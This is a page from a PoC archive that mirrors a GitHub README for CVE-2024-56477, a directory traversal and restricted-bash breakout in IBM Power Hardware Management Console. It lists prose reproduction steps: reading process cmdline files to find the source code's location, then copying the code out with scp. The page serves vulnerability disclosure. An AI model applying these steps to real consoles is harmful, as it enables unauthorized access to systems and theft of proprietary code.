Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2024-56477 PoC — IBM Power Hardware Management Console directory traversal

Source
https://github.com/0xbughunter/CVE-2024-56477
Associated Vulnerability
Title:IBM Power Hardware Management Console directory traversal (CVE-2024-56477)
Description:IBM Power Hardware Management Console V10.3.1050.0 could allow an authenticated user to traverse directories on the system. An attacker could send a specially crafted URL request containing "dot dot" sequences (/../) to view arbitrary files on the system.
Readme
# CVE-2024-56477: Able to traverse through directories from a restricted environment and access Power Hardware Management Console (HMC) source code

## Description

A privieleged user could identify the location of the source code from the already running process and completely access it via scp. The issue arises because of insufficient authorization controls configured for a low privileged user, a possible way of bypassing restricted bash. 

- **Vulnerability Type**: Directory Traversal
- **Severity**: Medium (CVSS: 6.5)
- **Impact**: Restricted Bash Breakout

### Summary

After escaping the restricted shell, an attacker could access sensitive data and files that were previously inaccessible.
Also If an attacker successfully breaks out of the restricted Bash environment, they may gain access to a broader set of system privileges, potentially escalating from a low-privileged user to a higher one.

---

## Affected Versions

The following versions of Power  are impacted by this vulnerability:

- Power Hardware Management Console (HMC) V10.3.1050.0	
- Affected on Linux platform

---

## Reproduction Steps

To reproduce this vulnerability, follow the steps below:

1. Access the restricted bash environment and from there navigate to the folder where process related information is stored.
2. For each and every process running in the system there will be a process id folder created and correponding cmdline file.
3. Read the cmdline file that's available agasint each of the process ids and you will end up finding location of the source code.
   <img width="1712" alt="01" src="https://github.com/user-attachments/assets/ad3b2449-f854-4b6b-97b8-87d4297f1d4b" />
5. Now using the scp command download the source code via the identified path.
   <img width="1712" alt="02" src="https://github.com/user-attachments/assets/d2b59f32-6be1-4bb5-a6a5-ab51fa85603b" />
   <img width="1683" alt="03" src="https://github.com/user-attachments/assets/d0d2f2d9-9b05-410e-bb5d-05539440a78c" />
File Snapshot

 [4.0K]  /data/pocs/889ae4f3247cbc1c8a1eff91034ba6938d204fc3
└── [2.0K]  README.md

0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →